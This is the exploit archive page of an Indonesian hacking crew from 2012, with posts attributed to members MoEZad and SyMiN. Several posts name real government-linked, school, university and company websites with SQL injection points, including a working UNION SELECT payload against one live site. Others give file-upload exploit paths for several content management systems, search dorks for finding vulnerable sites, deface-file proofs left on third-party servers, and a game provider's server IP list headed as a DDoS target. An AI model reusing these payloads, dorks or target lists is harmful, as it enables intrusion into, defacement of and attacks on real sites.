PastelCyber
Crew
today : | at : | safemode : ON
crew > / MoEZad / SyMiN / Judy_Geeks / E4w /

name author perms com modified label

Bug Research www.pertaminatongkang.co.id SQL Injection Vulnerabilitiy MoEZad rwxr-xr-x 0 3/28/2012

Filename Bug Research www.pertaminatongkang.co.id SQL Injection Vulnerabilitiy
Permission rw-r--r--
Author MoEZad
Date and Time 3/28/2012
Label
Action

#############################################
# Exploit Tittle : SQLi                     #
# Author         : MoEZad                   #
# Tested         : linux bt5r2              #
# Date           : 28 Mar , 2012            #
#############################################


[title]
# Bug Research www.pertaminatongkang.co.id SQL Injection Vulnerabilitiy


[note]
# Telah di temukan bug SQL Injection di website:
  http://pertaminatongkang.co.id
  oleh MoEZad


[vuln]
# http://pertaminatongkang.co.id/contents.php?lang=en&sub=news&p=1&id=[SQLi]


[thx]
# MAGELANG CYBER TEAM
# INDONESIAN CODER TEAM
# KILL-9 CREW
# PASTEL CYBER CREW


[piss]
# just testing security (^_^)v

SQL injection vulnerability situs pemerintah kalimantan Muhammad Miftahul Ulum rwxr-xr-x 1 3/21/2012

Filename SQL injection vulnerability situs pemerintah kalimantan
Permission rw-r--r--
Author Muhammad Miftahul Ulum
Date and Time 3/21/2012
Label
Action
#############################################
# Exploit Tittle : SQLi                     #
# Author         : SyMiN                    #
# Tested         : linux bt5r2              #
# Date           : 21 Mar , 2012            #
#############################################


[title]
# SQL injection vulnerability situs pemerintah kalimantan


[note]
# Telah di temukan bug SQL Injection di website:
  http://pkkprovkalsel.or.id
  oleh SyMiN

http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72[vuln]

[coba]
http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72%20UNION%20SELECT%201,2,version%28%29,user%28%29,5,6--

[thx]
# MAGELANG CYBER TEAM
# INDONESIAN CODER TEAM
# KILL-9 CREW
# PASTEL CYBER CREW


[piss]
# just testing security (^_^)v

Bug Research www.sman10-smg.sch.id SQL Injection Vulnerabilitiy MoEZad rwxr-xr-x 0 3/20/2012

Filename Bug Research www.sman10-smg.sch.id SQL Injection Vulnerabilitiy
Permission rw-r--r--
Author MoEZad
Date and Time 3/20/2012
Label
Action

#############################################
# Exploit Tittle : SQLi                     #
# Author         : MoEZad                   #
# Tested         : linux bt5r2              #
# Date           : 20 Mar , 2012            #
#############################################


[title]
# Bug Research www.sman10-smg.sch.id SQL Injection Vulnerabilitiy


[note]
# Telah di temukan bug SQL Injection di website:
  http://sman10-smg.sch.id
  oleh MoEZad


[vuln]
# http://sman10-smg.sch.id/?v=nw&id=[SQLi]


[thx]
# MAGELANG CYBER TEAM
# INDONESIAN CODER TEAM
# KILL-9 CREW
# PASTEL CYBER CREW


[piss]
# just testing security (^_^)v


Bug Research www.metallurgy.itb.ac.id SQL Injection Vulnerabilitiy MoEZad rwxr-xr-x 0 3/17/2012

Filename Bug Research www.metallurgy.itb.ac.id SQL Injection Vulnerabilitiy
Permission rw-r--r--
Author MoEZad
Date and Time 3/17/2012
Label
Action

#############################################
# Exploit Tittle : SQLi                     #
# Author         : MoEZad                   #
# Tested         : linux bt5r2              #
# Date           : 17 Mar , 2012            #
#############################################


[title]
# Bug Research www.metallurgy.itb.ac.id SQL Injection Vulnerabilitiy


[note]
# Telah di temukan bug SQL Injection di website:
  http://metallurgy.itb.ac.id
  oleh MoEZad


[vuln]
# http://metallurgy.itb.ac.id/berita/index.php?id=[SQLi]


[thx]
# MAGELANG CYBER TEAM
# INDONESIAN CODER TEAM
# KILL-9 CREW
# PASTEL CYBER CREW


[piss]
# just testing security (^_^)v

CMS Forix SQL Injection Vulnerabilitiy MoEZad rwxr-xr-x 2 3/17/2012

Filename CMS Forix SQL Injection Vulnerabilitiy
Permission rw-r--r--
Author MoEZad
Date and Time 3/17/2012
Label
Action

#############################################
# Exploit Tittle : SQLi FORIX               #
# Author  : MoEZad                   #
# Tested  : linux bt5r2              #
# Dork  : "items.php?cid="         #
#############################################


[POC]
- http://www.target.com/items.php?cid=[injection here]
[Page Admin]
- http://www.target.com/admin


NB:user adminnya berada di table acl

DDoS Server Zynga "Texas Holdem poker" MoEZad rwxr-xr-x 0 3/17/2012

Filename DDoS Server Zynga "Texas Holdem poker"
Permission rw-r--r--
Author MoEZad
Date and Time 3/17/2012
Label
Action

[+] http://facebook.poker.zynga.com/poker/server_status.php


[-] Code :
ip=74.114.14.10,name=New York,uCount=5979,maxUsers=7500,status=OK,id=1,type=normal,langPref=eg ip=74.114.14.11,name=Los Angeles,uCount=4592,maxUsers=7500,status=OK,id=2,type=normal,langPref=en ip=74.114.14.12,name=Chicago,uCount=3710,maxUsers=7500,status=OK,id=3,type=norma​l,langPref=en ip=74.114.14.13,name=Houston,uCount=4968,maxUsers=7500,status=OK,id=4,type=norma​l,langPref=eg ip=74.114.14.14,name=San Antonio,uCount=4676,maxUsers=7500,status=OK,id=5,type=normal,langPref=eg ip=74.114.14.15,name=Columbus,uCount=3184,maxUsers=7500,status=OK,id=6,type=norm​al,langPref=en ip=74.114.14.16,name=Istanbul,uCount=1200,maxUsers=7500,status=OK,id=7,type=norm​al,langPref=tr ip=74.114.14.17,name=Madrid,uCount=2730,maxUsers=7500,status=OK,id=8,type=normal​,langPref=es ip=74.114.14.18,name=Fort Worth,uCount=4089,maxUsers=7500,status=OK,id=9,type=normal,langPref=eg ip=74.114.14.19,name=Charlotte,uCount=3258,maxUsers=7500,status=OK,id=10,type=no​rmal,langPref=en ip=74.114.14.20,name=El Paso,uCount=3803,maxUsers=7500,status=OK,id=11,type=normal,langPref=eg ip=74.114.14.21,name=Ankara,uCount=992,maxUsers=7500,status=OK,id=12,type=normal​,langPref=tr ip=74.114.14.22,name=Barcelona,uCount=2723,maxUsers=7500,status=OK,id=13,type=no​rmal,langPref=es ip=74.114.14.23,name=Boston,uCount=3248,maxUsers=7500,status=OK,id=14,type=norma​l,langPref=en ip=74.114.14.24,name=Denver,uCount=3702,maxUsers=7500,status=OK,id=15,type=norma​l,langPref=eg ip=74.114.14.25,name=Washington DC,uCount=3263,maxUsers=7500,status=OK,id=16,type=normal,langPref=en ip=74.114.14.26,name=Nashville,uCount=3852,maxUsers=7500,status=OK,id=17,type=no​rmal,langPref=eg ip=74.114.14.27,name=Las Vegas,uCount=3246,maxUsers=7500,status=OK,id=18,type=normal,langPref=en ip=74.114.14.28,name=Portland,uCount=3199,maxUsers=7500,status=OK,id=19,type=nor​mal,langPref=en ip=74.114.14.29,name=Tucson,uCount=3742,maxUsers=7500,status=OK,id=20,type=norma​l,langPref=eg ip=74.114.14.30,name=Albuquerque,uCount=3254,maxUsers=7500,status=OK,id=21,type=​normal,langPref=en ip=74.114.14.31,name=Izmir,uCount=1069,maxUsers=7500,status=OK,id=22,type=normal​,langPref=tr ip=74.114.14.32,name=Valencia,uCount=2583,maxUsers=7500,status=OK,id=23,type=nor​mal,langPref=es ip=74.114.14.33,name=Atlanta,uCount=3841,maxUsers=7500,status=OK,id=24,type=norm​al,langPref=eg ip=74.114.14.34,name=Sacramento,uCount=3273,maxUsers=7500,status=OK,id=25,type=n​ormal,langPref=en ip=74.114.14.35,name=New Orleans,uCount=3224,maxUsers=7500,status=OK,id=26,type=normal,langPref=en ip=74.114.14.36,name=Cleveland,uCount=3610,maxUsers=7500,status=OK,id=27,type=no​rmal,langPref=eg ip=74.114.14.37,name=Kansas City,uCount=3185,maxUsers=7500,status=OK,id=28,type=normal,langPref=en ip=74.114.14.38,name=Omaha,uCount=3760,maxUsers=7500,status=OK,id=29,type=normal​,langPref=eg ip=74.114.14.39,name=Miami,uCount=3251,maxUsers=7500,status=OK,id=30,type=normal​,langPref=en ip=74.114.14.40,name=Mesa,uCount=3209,maxUsers=7500,status=OK,id=31,type=normal,​langPref=en ip=74.114.14.41,name=Virginia Beach,uCount=3692,maxUsers=7500,status=OK,id=32,type=normal,langPref=eg ip=74.114.14.42,name=Temecula,uCount=3253,maxUsers=7500,status=OK,id=33,type=nor​mal,langPref=en ip=74.114.14.43,name=Berkeley,uCount=3243,maxUsers=7500,status=OK,id=34,type=nor​mal,langPref=en ip=74.114.14.44,name=Tulsa,uCount=3213,maxUsers=7500,status=OK,id=35,type=normal​,langPref=en ip=74.114.14.45,name=Honolulu,uCount=3288,maxUsers=7500,status=OK,id=36,type=nor​mal,langPref=en ip=74.114.14.46,name=Minneapolis,uCount=3844,maxUsers=7500,status=OK,id=37,type=​normal,langPref=eg ip=74.114.14.47,name=Colorado Springs,uCount=3263,maxUsers=7500,status=OK,id=38,type=normal,langPref=en ip=74.114.14.48,name=San Diego,uCount=3215,maxUsers=7500,status=OK,id=39,type=normal,langPref=en ip=74.114.14.49,name=Bursa,uCount=871,maxUsers=7500,status=OK,id=40,type=normal,​langPref=tr ip=74.114.14.50,name=Dallas,uCount=3215,maxUsers=7500,status=OK,id=41,type=norma​l,langPref=en ip=74.114.14.51,name=San Jose,uCount=3554,maxUsers=7500,status=OK,id=42,type=normal,langPref=eg ip=74.114.14.52,name=Indianapolis,uCount=3249,maxUsers=7500,status=OK,id=43,type​=normal,langPref=en ip=74.114.14.53,name=Jacksonville,uCount=3722,maxUsers=7500,status=OK,id=44,type​=normal,langPref=eg ip=74.114.14.54,name=San Francisco,uCount=3252,maxUsers=7500,status=OK,id=45,type=normal,langPref=en ip=74.114.14.55,name=Austin,uCount=3681,maxUsers=7500,status=OK,id=46,type=norma​l,langPref=eg ip=74.114.14.56,name=Memphis,uCount=3209,maxUsers=7500,status=OK,id=47,type=norm​al,langPref=en ip=74.114.14.57,name=Baltimore,uCount=3817,maxUsers=7500,status=OK,id=48,type=no​rmal,langPref=eg ip=74.114.14.58,name=Philadelphia,uCount=3272,maxUsers=7500,status=OK,id=49,type​=normal,langPref=en ip=74.114.14.59,name=Phoenix,uCount=3236,maxUsers=7500,status=OK,id=50,type=norm​al,langPref=en ip=74.114.14.60,name=Milwaukee,uCount=3610,maxUsers=7500,status=OK,id=51,type=no​rmal,langPref=eg ip=74.114.14.61,name=Seattle,uCount=3240,maxUsers=7500,status=OK,id=52,type=norm​al,langPref=en ip=74.114.14.62,name=Detroit,uCount=3262,maxUsers=7500,status=OK,id=53,type=norm​al,langPref=en ip=74.114.14.63,name=Oakland,uCount=3466,maxUsers=7500,status=OK,id=54,type=norm​al,langPref=eg ip=74.114.14.64,name=Raleigh,uCount=3628,maxUsers=7500,status=OK,id=55,type=norm​al,langPref=eg ip=74.114.14.65,name=Wichita,uCount=3607,maxUsers=7500,status=OK,id=56,type=norm​al,langPref=eg ip=74.114.14.66,name=St Louis,uCount=3225,maxUsers=7500,status=OK,id=57,type=normal,langPref=en ip=74.114.14.67,name=Cincinnati,uCount=3275,maxUsers=7500,status=OK,id=58,type=n​ormal,langPref=en ip=74.114.14.68,name=Louisville,uCount=3233,maxUsers=7500,status=OK,id=59,type=n​ormal,langPref=en ip=74.114.14.69,name=California,uCount=3532,maxUsers=7500,status=OK,id=60,type=n​ormal,langPref=cl ip=74.114.14.70,name=SitNGo 1,uCount=2216,maxUsers=7500,status=OK,id=61,type=sitngo,langPref=en ip=74.114.14.71,name=SitNGo 2,uCount=2231,maxUsers=7500,status=OK,id=62,type=sitngo,langPref=en ip=74.114.14.72,name=SitNGo 3,uCount=2214,maxUsers=7500,status=OK,id=63,type=sitngo,langPref=en ip=74.114.14.73,name=SitNGo 4,uCount=2205,maxUsers=7500,status=OK,id=64,type=sitngo,langPref=en ip=74.114.14.74,name=Weekly Tourney 1,uCount=401,maxUsers=7500,status=OK,id=65,type=tourney,langPref=en ip=74.114.14.75,name=Weekly Tourney 2,uCount=459,maxUsers=7500,status=OK,id=66,type=tourney,langPref=en ip=74.114.14.76,name=VIP 1,uCount=571,maxUsers=7500,status=OK,id=67,type=vip,langPref=en ip=74.114.14.77,name=VIP 2,uCount=627,maxUsers=7500,status=OK,id=68,type=vip,langPref=en ip=74.114.14.78,name=Shootout 1,uCount=1738,maxUsers=7500,status=OK,id=69,type=shootout1,langPref=en ip=74.114.14.79,name=Shootout 2,uCount=1731,maxUsers=7500,status=OK,id=70,type=shootout1,langPref=en ip=74.114.14.80,name=Shootout 3,uCount=1733,maxUsers=7500,status=OK,id=71,type=shootout1,langPref=en ip=74.114.14.81,name=Shootout 4,uCount=1671,maxUsers=7500,status=OK,id=72,type=shootout1,langPref=en ip=74.114.14.82,name=Shootout 5,uCount=1725,maxUsers=7500,status=OK,id=73,type=shootout1,langPref=en ip=74.114.14.83,name=Shootout 6,uCount=1705,maxUsers=7500,status=OK,id=74,type=shootout1,langPref=en ip=74.114.14.84,name=Shootout 7,uCount=1721,maxUsers=7500,status=OK,id=75,type=shootout1,langPref=en ip=74.114.14.85,name=Shootout 8,uCount=892,maxUsers=7500,status=OK,id=76,type=shootout3,langPref=en ip=74.114.14.86,name=Shootout 9,uCount=915,maxUsers=7500,status=OK,id=77,type=shootout3,langPref=en ip=74.114.14.87,name=Shootout 10,uCount=931,maxUsers=7500,status=OK,id=78,type=shootout3,langPref=en ip=74.114.14.88,name=Shootout 11,uCount=878,maxUsers=7500,status=OK,id=79,type=shootout3,langPref=en ip=74.114.14.89,name=Shootout 12,uCount=911,maxUsers=7500,status=OK,id=80,type=shootout3,langPref=en

CMS Sea-Lion File Upload Vulnerability MoEZad rwxr-xr-x 0 3/17/2012

Filename CMS Sea-Lion File Upload Vulnerability
Permission rw-r--r--
Author MoEZad
Date and Time 3/17/2012
Label
Action

### CMS Sea-Lion File Upload Vulnerability ###
[-]Dork : 
  - "Copyright 2010. CMS-SL. Developed by Sea-Lion Team"
[-] Exploit :
   [-] http://public_html/cms/images/
      - http://public_html/cms/images/index.php?uplid=&uplact=headImg&u=&pathext=&permis1=&permis2=
[-] Cihuy :D :
  - http://public_html/cms/images/MoEZad-Ganteng.htm

CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads MoEZad rwxr-xr-x 0 3/17/2012

Filename CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads
Permission rw-r--r--
Author MoEZad
Date and Time 3/17/2012
Label
Action

### CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads ###


[-]Dork : 
  - inurl:/html/siswa.php?
  - inurl:/html/alumni.php?
  - inurl:/html/guru.php?


[-] Exploit :
  - http://public_html/dir/editor/filemanager/connectors/uploadtest.html
  - http://public_html/dir/editor/filemanager/connectors/test.html
  - http://public_html/dir/editor/filemanager/browser/default/browser.html


[-] Cihuy :D :
  - http://public_html/userfiles/file/file-deface.txt
  - http://public_html/userfiles/file-deface.txt

FileChucker-Uploader v4.x File Upload Vulnerability MoEZad rwxr-xr-x 0 3/16/2012

Filename FileChucker-Uploader v4.x File Upload Vulnerability
Permission rw-r--r--
Author MoEZad
Date and Time 3/16/2012
Label
Action

[~] FileChucker-Uploader v4.x File Upload Vulnerability
[~] Author : MoEZad (IndonesianCoder Team | MagelangCyber Team)
[~] Homepage : http://facebook.com/groups/pastelcybercrew
[~] Date : 16 Mar , 2012


[ Software Information ]
[+] Vulnerability : File Upload
[+] Dork : allintext:"File Upload by Encodable"
[+] LOCATION : INDONESIA -


[ Vulnerable File ]
[+] http://127.0.0.1/[MoEZad]/uploaddemo/
[+] http://127.0.0.1/[MoEZad]/upload/
[+] http://127.0.0.1/[MoEZad]/upload/filechucker.cgi
[+] http://127.0.0.1/[MoEZad]/cgi-bin/filechucker.plx
[+] http://127.0.0.1/[MoEZad]/file-upload


[ POC ]
[+] http://tradeshowdirect.com/uploader/files/pc-crew.htm
[+] http://presstimecolor.com/upload/files/pc-crew.htm
[+] http://encodable.com/uploaddemo/files/pc-crew.htm


[ Thx TO ]
[+] MAGELANG CYBER TEAM
[+] INDONESIAN CODER TEAM
[+] KILL-9 CREW
[-] PASTEL CYBER CREW
   [*] Symin, DHIAKA_27, Judy_Geeks ~ etc etc


[ NOTE ]
[+] just testing security... ;)

Php-X-Links Script SQL Injection Vulnerabilitiy MoEZad rwxr-xr-x 0 3/16/2012

Filename Php-X-Links Script SQL Injection Vulnerabilitiy
Permission rw-r--r--
Author MoEZad
Date and Time 3/16/2012
Label
Action

[~] Title : Php-X-Links Script SQL Injection Vulnerabilitiy
[~] Date : 16 Mar , 2012


[ Software Information ]
[+] Vulnerability : SQL INJECTION
[+] Dork : “think it :D”
[+] LOCATION : INDONESIA -


[ Exploit ]
# http://www.target.com/links/rate.php?id=%5BSQLi%5D
# http://www.target.com/links/view.php?cid=%5BSQLi%5D
# http://www.target.com/links/pop.php?t=%5BSQLi%5D


[ Thx TO ]
[+] INDONESIANCODER EXPLOIT-ID MAGELANGCYBER TEAM MALANGCYBER CREW KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0
[+] f4ckMen,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr.Cruzz
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo,zaenal,gepenk ~ etc etc
[+] All Pastel Cyber Crew,SyMiN,E4w,Judy_Geeks ~ etc etc 


[ NOTE ]
[+] just testing security ;)
 

Jayalah Indonesiaku © 2012 Pastel Cyber | We Are SMK Telkom DU Hacker Family | SMK Telkom DU Exploit Archive
recode by MoEZad